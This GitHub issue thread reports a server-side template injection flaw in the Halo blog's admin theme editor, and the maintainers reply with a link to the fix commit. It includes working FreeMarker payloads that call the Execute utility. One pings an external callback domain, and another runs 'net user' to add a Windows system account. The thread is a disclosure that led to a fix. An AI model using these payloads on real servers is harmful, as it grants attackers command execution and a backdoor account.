unsafe template file permissions edit cause Server Side Template Injection(SSTI)

[c0d1007]

我确定我已经查看了 (标注[ ]为[x])

• [ ] Halo 使用文档
• [ ] Halo 论坛
• [ ] Github Wiki 常见问题
• [ x] 其他 Issues

---

我要申请 (标注[ ]为[x])

• [x ] BUG 反馈
• [ ] 添加新的特性或者功能
• [ ] 请求技术支持

Testing environment

java version:1.8.0_181 os system: windows server ip address:192.168.126.136

Vulnerability Test

Simple test

access address http://192.168.126.136:8090/admin/ and login in the backstage.Click exterior(外观) and select theme editor(主题编辑). Select any one of the template files,such as "page-top.ftl". Then edit the file and insert a template statement like this.

payload-1

<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("ping ggggga.2xxxxxj.ceye.io") }

Save the file and refresh home page,and then ceye platform can receive a message

Execute system command

also edit "page-top.ftl" to execute system command to add system user.

payload-2

<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("net user security security /add") }

save the file again and refresh home page again.Then will add user in the system

Remark

Because the preview does not display the picture properly when editing the issus, you can visit my github project(https://github.com/c0d1007/exploit) and view the picture.

Solution

Template files can only be edited locally, or check the file input

[JohnNiang]

This issue seems to be fixed here https://github.com/halo-dev/halo/issues/419 .

[c0d1007]

Has the vulnerability been fixed?

[c0d1007]

Can i find you in halo qq group, i want to know how to fix it?Because i used your blog.

[JohnNiang]

Can i find you in halo qq group, i want to know how to fix it?Because i used your blog.

https://github.com/halo-dev/halo/commit/dc3a73ee02ca183c509dedf703db28c80219c41c

But halo has not been released the newest version.

[c0d1007]

ok,thank you.

[JohnNiang]

ok,thank you.

But you have to test it before using.